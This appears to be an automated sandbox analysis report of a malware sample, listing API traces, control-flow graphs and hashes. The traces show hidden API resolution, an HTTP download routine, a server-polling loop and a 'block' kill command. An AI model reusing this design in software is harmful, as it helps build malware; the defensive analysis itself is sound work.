                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: e463317c8f1f3f11adc7e0006d424d4de637caaca645147fed02ab6b00609cbc
                              • Instruction ID: 87a9d40b6fbda0a38b26d286123935ea65d5d9caf2cd350d5f5e1e8071efaf5a
                              • Opcode Fuzzy Hash: e463317c8f1f3f11adc7e0006d424d4de637caaca645147fed02ab6b00609cbc
                              • Instruction Fuzzy Hash: B0D05EB890030CDBCB00EFE0D949AEDBB79FB0C311F001559D90972340EA306481CAA6
                              Function 004C9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 4c9c10-4c9c1a 634 4ca036-4ca0ca LoadLibraryA * 8 633->634 635 4c9c20-4ca031 GetProcAddress * 43 633->635 636 4ca0cc-4ca141 GetProcAddress * 5 634->636 637 4ca146-4ca14d 634->637 635->634 636->637 638 4ca216-4ca21d 637->638 639 4ca153-4ca211 GetProcAddress * 8 637->639 640 4ca21f-4ca293 GetProcAddress * 5 638->640 641 4ca298-4ca29f 638->641 639->638 640->641 642 4ca2a5-4ca332 GetProcAddress * 6 641->642 643 4ca337-4ca33e 641->643 642->643 644 4ca41f-4ca426 643->644 645 4ca344-4ca41a GetProcAddress * 9 643->645 646 4ca428-4ca49d GetProcAddress * 5 644->646 647 4ca4a2-4ca4a9 644->647 645->644 646->647 648 4ca4dc-4ca4e3 647->648 649 4ca4ab-4ca4d7 GetProcAddress * 2 647->649 650 4ca515-4ca51c 648->650 651 4ca4e5-4ca510 GetProcAddress * 2 648->651 649->648 652 4ca612-4ca619 650->652 653 4ca522-4ca60d GetProcAddress * 10 650->653 651->650 654 4ca67d-4ca684 652->654 655 4ca61b-4ca678 GetProcAddress * 4 652->655 653->652 656 4ca69e-4ca6a5 654->656 657 4ca686-4ca699 GetProcAddress 654->657 655->654 658 4ca708-4ca709 656->658 659 4ca6a7-4ca703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(76F70000,01176680), ref: 004C9C2D
                              • GetProcAddress.KERNEL32(76F70000,011766A0), ref: 004C9C45
                              • GetProcAddress.KERNEL32(76F70000,01188EC8), ref: 004C9C5E
                              • GetProcAddress.KERNEL32(76F70000,01188EE0), ref: 004C9C76
                              • GetProcAddress.KERNEL32(76F70000,0118C060), ref: 004C9C8E
                              • GetProcAddress.KERNEL32(76F70000,0118C210), ref: 004C9CA7
                              • GetProcAddress.KERNEL32(76F70000,0117B350), ref: 004C9CBF
                              • GetProcAddress.KERNEL32(76F70000,0118C180), ref: 004C9CD7
                              • GetProcAddress.KERNEL32(76F70000,0118C300), ref: 004C9CF0
                              • GetProcAddress.KERNEL32(76F70000,0118C168), ref: 004C9D08
                              • GetProcAddress.KERNEL32(76F70000,0118C078), ref: 004C9D20
                              • GetProcAddress.KERNEL32(76F70000,011766C0), ref: 004C9D39
                              • GetProcAddress.KERNEL32(76F70000,01176700), ref: 004C9D51
                              • GetProcAddress.KERNEL32(76F70000,01176720), ref: 004C9D69
                              • GetProcAddress.KERNEL32(76F70000,011767A0), ref: 004C9D82
                              • GetProcAddress.KERNEL32(76F70000,0118C0C0), ref: 004C9D9A
                              • GetProcAddress.KERNEL32(76F70000,0118C1C8), ref: 004C9DB2
                              • GetProcAddress.KERNEL32(76F70000,0117B148), ref: 004C9DCB
                              • GetProcAddress.KERNEL32(76F70000,01176740), ref: 004C9DE3
                              • GetProcAddress.KERNEL32(76F70000,0118C258), ref: 004C9DFB
                              • GetProcAddress.KERNEL32(76F70000,0118C240), ref: 004C9E14
                              • GetProcAddress.KERNEL32(76F70000,0118C2A0), ref: 004C9E2C
                              • GetProcAddress.KERNEL32(76F70000,0118C2E8), ref: 004C9E44
                              • GetProcAddress.KERNEL32(76F70000,01176760), ref: 004C9E5D
                              • GetProcAddress.KERNEL32(76F70000,0118C0D8), ref: 004C9E75
                              • GetProcAddress.KERNEL32(76F70000,0118C0F0), ref: 004C9E8D
                              • GetProcAddress.KERNEL32(76F70000,0118C150), ref: 004C9EA6
                              • GetProcAddress.KERNEL32(76F70000,0118C120), ref: 004C9EBE
                              • GetProcAddress.KERNEL32(76F70000,0118C090), ref: 004C9ED6
                              • GetProcAddress.KERNEL32(76F70000,0118C1E0), ref: 004C9EEF
                              • GetProcAddress.KERNEL32(76F70000,0118C0A8), ref: 004C9F07
                              • GetProcAddress.KERNEL32(76F70000,0118C108), ref: 004C9F1F
                              • GetProcAddress.KERNEL32(76F70000,0118C138), ref: 004C9F38
                              • GetProcAddress.KERNEL32(76F70000,0118CEC8), ref: 004C9F50
                              • GetProcAddress.KERNEL32(76F70000,0118C1F8), ref: 004C9F68
                              • GetProcAddress.KERNEL32(76F70000,0118C228), ref: 004C9F81
                              • GetProcAddress.KERNEL32(76F70000,01176780), ref: 004C9F99
                              • GetProcAddress.KERNEL32(76F70000,0118C2B8), ref: 004C9FB1
                              • GetProcAddress.KERNEL32(76F70000,011767C0), ref: 004C9FCA
                              • GetProcAddress.KERNEL32(76F70000,0118C2D0), ref: 004C9FE2
                              • GetProcAddress.KERNEL32(76F70000,0118C198), ref: 004C9FFA
                              • GetProcAddress.KERNEL32(76F70000,01176280), ref: 004CA013
                              • GetProcAddress.KERNEL32(76F70000,011762C0), ref: 004CA02B
                              • LoadLibraryA.KERNEL32(0118C1B0,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA03D
                              • LoadLibraryA.KERNEL32(0118C270,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA04E
                              • LoadLibraryA.KERNEL32(0118C288,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA060
                              • LoadLibraryA.KERNEL32(0118C318,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA072
                              • LoadLibraryA.KERNEL32(0118C030,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA083
                              • LoadLibraryA.KERNEL32(0118C048,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA095
                              • LoadLibraryA.KERNEL32(0118C618,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA0A7
                              • LoadLibraryA.KERNEL32(0118C3C0,?,004C5CA3,004D0AEB,?,?,?,?,?,?,?,?,?,?,004D0AEA,004D0AE3), ref: 004CA0B8
                              • GetProcAddress.KERNEL32(75840000,011761E0), ref: 004CA0DA
                              • GetProcAddress.KERNEL32(75840000,0118C330), ref: 004CA0F2
                              • GetProcAddress.KERNEL32(75840000,01188AC8), ref: 004CA10A
                              • GetProcAddress.KERNEL32(75840000,0118C3D8), ref: 004CA123
                              • GetProcAddress.KERNEL32(75840000,01176460), ref: 004CA13B
                              • GetProcAddress.KERNEL32(73B50000,0117AE50), ref: 004CA160
                              • GetProcAddress.KERNEL32(73B50000,01176240), ref: 004CA179
                              • GetProcAddress.KERNEL32(73B50000,0117AEF0), ref: 004CA191
                              • GetProcAddress.KERNEL32(73B50000,0118C600), ref: 004CA1A9
                              • GetProcAddress.KERNEL32(73B50000,0118C528), ref: 004CA1C2
                              • GetProcAddress.KERNEL32(73B50000,01176580), ref: 004CA1DA
                              • GetProcAddress.KERNEL32(73B50000,011765A0), ref: 004CA1F2
                              • GetProcAddress.KERNEL32(73B50000,0118C5E8), ref: 004CA20B
                              • GetProcAddress.KERNEL32(760B0000,011762E0), ref: 004CA22C
                              • GetProcAddress.KERNEL32(760B0000,01176560), ref: 004CA244
                              • GetProcAddress.KERNEL32(760B0000,0118C390), ref: 004CA25D
                              • GetProcAddress.KERNEL32(760B0000,0118C408), ref: 004CA275
                              • GetProcAddress.KERNEL32(760B0000,01176220), ref: 004CA28D
                              • GetProcAddress.KERNEL32(75D30000,0117AF90), ref: 004CA2B3
                              • GetProcAddress.KERNEL32(75D30000,0117AD88), ref: 004CA2CB
                              • GetProcAddress.KERNEL32(75D30000,0118C3F0), ref: 004CA2E3
                              • GetProcAddress.KERNEL32(75D30000,01176440), ref: 004CA2FC
                              • GetProcAddress.KERNEL32(75D30000,01176540), ref: 004CA314
                              • GetProcAddress.KERNEL32(75D30000,0117ADD8), ref: 004CA32C
                              • GetProcAddress.KERNEL32(753A0000,0118C348), ref: 004CA352
                              • GetProcAddress.KERNEL32(753A0000,011764C0), ref: 004CA36A
                              • GetProcAddress.KERNEL32(753A0000,01188A58), ref: 004CA382
                              • GetProcAddress.KERNEL32(753A0000,0118C378), ref: 004CA39B
                              • GetProcAddress.KERNEL32(753A0000,0118C3A8), ref: 004CA3B3
                              • GetProcAddress.KERNEL32(753A0000,01176300), ref: 004CA3CB
                              • GetProcAddress.KERNEL32(753A0000,011761C0), ref: 004CA3E4
                              • GetProcAddress.KERNEL32(753A0000,0118C558), ref: 004CA3FC
                              • GetProcAddress.KERNEL32(753A0000,0118C4C8), ref: 004CA414
                              • GetProcAddress.KERNEL32(76DA0000,01176320), ref: 004CA436
                              • GetProcAddress.KERNEL32(76DA0000,0118C5A0), ref: 004CA44E
                              • GetProcAddress.KERNEL32(76DA0000,0118C4B0), ref: 004CA466
                              • GetProcAddress.KERNEL32(76DA0000,0118C360), ref: 004CA47F
                              • GetProcAddress.KERNEL32(76DA0000,0118C4F8), ref: 004CA497
                              • GetProcAddress.KERNEL32(77300000,01176420), ref: 004CA4B8
                              • GetProcAddress.KERNEL32(77300000,01176340), ref: 004CA4D1
                              • GetProcAddress.KERNEL32(767E0000,01176200), ref: 004CA4F2
                              • GetProcAddress.KERNEL32(767E0000,0118C420), ref: 004CA50A
                              • GetProcAddress.KERNEL32(6F6A0000,01176260), ref: 004CA530
                              • GetProcAddress.KERNEL32(6F6A0000,011763C0), ref: 004CA548
                              • GetProcAddress.KERNEL32(6F6A0000,011762A0), ref: 004CA560
                              • GetProcAddress.KERNEL32(6F6A0000,0118C438), ref: 004CA579
                              • GetProcAddress.KERNEL32(6F6A0000,01176480), ref: 004CA591
                              • GetProcAddress.KERNEL32(6F6A0000,01176360), ref: 004CA5A9
                              • GetProcAddress.KERNEL32(6F6A0000,011763A0), ref: 004CA5C2
                              • GetProcAddress.KERNEL32(6F6A0000,01176380), ref: 004CA5DA
                              • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 004CA5F1
                              • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 004CA607
                              • GetProcAddress.KERNEL32(75760000,0118C450), ref: 004CA629
                              • GetProcAddress.KERNEL32(75760000,011889A8), ref: 004CA641
                              • GetProcAddress.KERNEL32(75760000,0118C480), ref: 004CA659
                              • GetProcAddress.KERNEL32(75760000,0118C468), ref: 004CA672
                              • GetProcAddress.KERNEL32(762C0000,011764A0), ref: 004CA693
                              • GetProcAddress.KERNEL32(6EBB0000,0118C5D0), ref: 004CA6B4
                              • GetProcAddress.KERNEL32(6EBB0000,011763E0), ref: 004CA6CD
                              • GetProcAddress.KERNEL32(6EBB0000,0118C498), ref: 004CA6E5
                              • GetProcAddress.KERNEL32(6EBB0000,0118C4E0), ref: 004CA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: f0bd87241f146168771100699120852ada7be3abe81ebbfcc3f1e30e4589b5f9
                              • Instruction ID: 6766c9f59a01253df8c598b7c447f47a9be9408917ce06df79b4e9fac7955699
                              • Opcode Fuzzy Hash: f0bd87241f146168771100699120852ada7be3abe81ebbfcc3f1e30e4589b5f9
                              • Instruction Fuzzy Hash: 126229FA600201AFC344EFE9ED88DB637FBF74C241714A61AE61DC3264D679A841DB52
                              Function 004B6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 4b6280-4b630b call 4ca7a0 call 4b47b0 call 4ca740 InternetOpenA StrCmpCA 1040 4b630d 1033->1040 1041 4b6314-4b6318 1033->1041 1040->1041 1042 4b6509-4b6525 call 4ca7a0 call 4ca800 * 2 1041->1042 1043 4b631e-4b6342 InternetConnectA 1041->1043 1062 4b6528-4b652d 1042->1062 1045 4b6348-4b634c 1043->1045 1046 4b64ff-4b6503 InternetCloseHandle 1043->1046 1047 4b635a 1045->1047 1048 4b634e-4b6358 1045->1048 1046->1042 1050 4b6364-4b6392 HttpOpenRequestA 1047->1050 1048->1050 1052 4b6398-4b639c 1050->1052 1053 4b64f5-4b64f9 InternetCloseHandle 1050->1053 1055 4b639e-4b63bf InternetSetOptionA 1052->1055 1056 4b63c5-4b6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 4b642c-4b644b call 4c8940 1056->1058 1059 4b6407-4b6427 call 4ca740 call 4ca800 * 2 1056->1059 1066 4b64c9-4b64e9 call 4ca740 call 4ca800 * 2 1058->1066 1067 4b644d-4b6454 1058->1067 1059->1062 1066->1062 1069 4b64c7-4b64ef InternetCloseHandle 1067->1069 1070 4b6456-4b6480 InternetReadFile 1067->1070 1069->1053 1073 4b648b 1070->1073 1074 4b6482-4b6489 1070->1074 1073->1069 1074->1073 1078 4b648d-4b64c5 call 4ca9b0 call 4ca8a0 call 4ca800 1074->1078 1078->1070
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                                • Part of subcall function 004B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • InternetOpenA.WININET(004D0DFE,00000001,00000000,00000000,00000000), ref: 004B62E1
                              • StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004B63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004B63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004B63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004B646D
                              • InternetCloseHandle.WININET(00000000), ref: 004B64EF
                              • InternetCloseHandle.WININET(00000000), ref: 004B64F9
                              • InternetCloseHandle.WININET(00000000), ref: 004B6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 8244b7f1567b97490c7f98a5877f9a0720818e0d627b3114048db405f77cb595
                              • Instruction ID: 5c7414ff9428aff1e149a6a9a12dd3d9920a6051fab1dccc310df2803df757aa
                              • Opcode Fuzzy Hash: 8244b7f1567b97490c7f98a5877f9a0720818e0d627b3114048db405f77cb595
                              • Instruction Fuzzy Hash: CA718075A00208ABDB24EFE0DC49FEE7775BB44704F10815EF5096B290DBB86A85CF66
                              Function 004C5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 4c5510-4c5577 call 4c5ad0 call 4ca820 * 3 call 4ca740 * 4 1106 4c557c-4c5583 1090->1106 1107 4c5585-4c55b6 call 4ca820 call 4ca7a0 call 4b1590 call 4c51f0 1106->1107 1108 4c55d7-4c564c call 4ca740 * 2 call 4b1590 call 4c52c0 call 4ca8a0 call 4ca800 call 4caad0 StrCmpCA 1106->1108 1124 4c55bb-4c55d2 call 4ca8a0 call 4ca800 1107->1124 1134 4c5693-4c56a9 call 4caad0 StrCmpCA 1108->1134 1137 4c564e-4c568e call 4ca7a0 call 4b1590 call 4c51f0 call 4ca8a0 call 4ca800 1108->1137 1124->1134 1140 4c57dc-4c5844 call 4ca8a0 call 4ca820 * 2 call 4b1670 call 4ca800 * 4 call 4c6560 call 4b1550 1134->1140 1141 4c56af-4c56b6 1134->1141 1137->1134 1272 4c5ac3-4c5ac6 1140->1272 1142 4c56bc-4c56c3 1141->1142 1143 4c57da-4c585f call 4caad0 StrCmpCA 1141->1143 1146 4c571e-4c5793 call 4ca740 * 2 call 4b1590 call 4c52c0 call 4ca8a0 call 4ca800 call 4caad0 StrCmpCA 1142->1146 1147 4c56c5-4c5719 call 4ca820 call 4ca7a0 call 4b1590 call 4c51f0 call 4ca8a0 call 4ca800 1142->1147 1161 4c5865-4c586c 1143->1161 1162 4c5991-4c59f9 call 4ca8a0 call 4ca820 * 2 call 4b1670 call 4ca800 * 4 call 4c6560 call 4b1550 1143->1162 1146->1143 1250 4c5795-4c57d5 call 4ca7a0 call 4b1590 call 4c51f0 call 4ca8a0 call 4ca800 1146->1250 1147->1143 1167 4c598f-4c5a14 call 4caad0 StrCmpCA 1161->1167 1168 4c5872-4c5879 1161->1168 1162->1272 1197 4c5a28-4c5a91 call 4ca8a0 call 4ca820 * 2 call 4b1670 call 4ca800 * 4 call 4c6560 call 4b1550 1167->1197 1198 4c5a16-4c5a21 Sleep 1167->1198 1174 4c587b-4c58ce call 4ca820 call 4ca7a0 call 4b1590 call 4c51f0 call 4ca8a0 call 4ca800 1168->1174 1175 4c58d3-4c5948 call 4ca740 * 2 call 4b1590 call 4c52c0 call 4ca8a0 call 4ca800 call 4caad0 StrCmpCA 1168->1175 1174->1167 1175->1167 1276 4c594a-4c598a call 4ca7a0 call 4b1590 call 4c51f0 call 4ca8a0 call 4ca800 1175->1276 1197->1272 1198->1106 1250->1143 1276->1167
                              APIs
                                • Part of subcall function 004CA820: lstrlen.KERNEL32(004B4F05,?,?,004B4F05,004D0DDE), ref: 004CA82B
                                • Part of subcall function 004CA820: lstrcpy.KERNEL32(004D0DDE,00000000), ref: 004CA885
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C5857
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C5228
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C5318
                                • Part of subcall function 004C52C0: lstrlen.KERNEL32(00000000), ref: 004C532F
                                • Part of subcall function 004C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 004C5364
                                • Part of subcall function 004C52C0: lstrlen.KERNEL32(00000000), ref: 004C5383
                                • Part of subcall function 004C52C0: lstrlen.KERNEL32(00000000), ref: 004C53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 004C5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 15809f2a56e9546e00d455d01d6900620b921307455f34c6cd8e9e2ff30d49d8
                              • Instruction ID: db212b39166dfd47b76d51234095384f43e0da0aade13c72f9107b50161ab122
                              • Opcode Fuzzy Hash: 15809f2a56e9546e00d455d01d6900620b921307455f34c6cd8e9e2ff30d49d8
                              • Instruction Fuzzy Hash: 73E16179910108ABCB54FBA1DC56FFD7339AF54308F50812EB40652191EF38AE59CBBA
                              Function 004C17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 4c17a0-4c17cd call 4caad0 StrCmpCA 1304 4c17cf-4c17d1 ExitProcess 1301->1304 1305 4c17d7-4c17f1 call 4caad0 1301->1305 1309 4c17f4-4c17f8 1305->1309 1310 4c17fe-4c1811 1309->1310 1311 4c19c2-4c19cd call 4ca800 1309->1311 1313 4c199e-4c19bd 1310->1313 1314 4c1817-4c181a 1310->1314 1313->1309 1316 4c18ad-4c18be StrCmpCA 1314->1316 1317 4c18cf-4c18e0 StrCmpCA 1314->1317 1318 4c198f-4c1999 call 4ca820 1314->1318 1319 4c1849-4c1858 call 4ca820 1314->1319 1320 4c1821-4c1830 call 4ca820 1314->1320 1321 4c185d-4c186e StrCmpCA 1314->1321 1322 4c187f-4c1890 StrCmpCA 1314->1322 1323 4c1835-4c1844 call 4ca820 1314->1323 1324 4c1970-4c1981 StrCmpCA 1314->1324 1325 4c18f1-4c1902 StrCmpCA 1314->1325 1326 4c1951-4c1962 StrCmpCA 1314->1326 1327 4c1932-4c1943 StrCmpCA 1314->1327 1328 4c1913-4c1924 StrCmpCA 1314->1328 1337 4c18ca 1316->1337 1338 4c18c0-4c18c3 1316->1338 1339 4c18ec 1317->1339 1340 4c18e2-4c18e5 1317->1340 1318->1313 1319->1313 1320->1313 1333 4c187a 1321->1333 1334 4c1870-4c1873 1321->1334 1335 4c189e-4c18a1 1322->1335 1336 4c1892-4c189c 1322->1336 1323->1313 1350 4c198d 1324->1350 1351 4c1983-4c1986 1324->1351 1341 4c190e 1325->1341 1342 4c1904-4c1907 1325->1342 1347 4c196e 1326->1347 1348 4c1964-4c1967 1326->1348 1345 4c194f 1327->1345 1346 4c1945-4c1948 1327->1346 1343 4c1926-4c1929 1328->1343 1344 4c1930 1328->1344 1333->1313 1334->1333 1354 4c18a8 1335->1354 1336->1354 1337->1313 1338->1337 1339->1313 1340->1339 1341->1313 1342->1341 1343->1344 1344->1313 1345->1313 1346->1345 1347->1313 1348->1347 1350->1313 1351->1350 1354->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 004C17C5
                              • ExitProcess.KERNEL32 ref: 004C17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
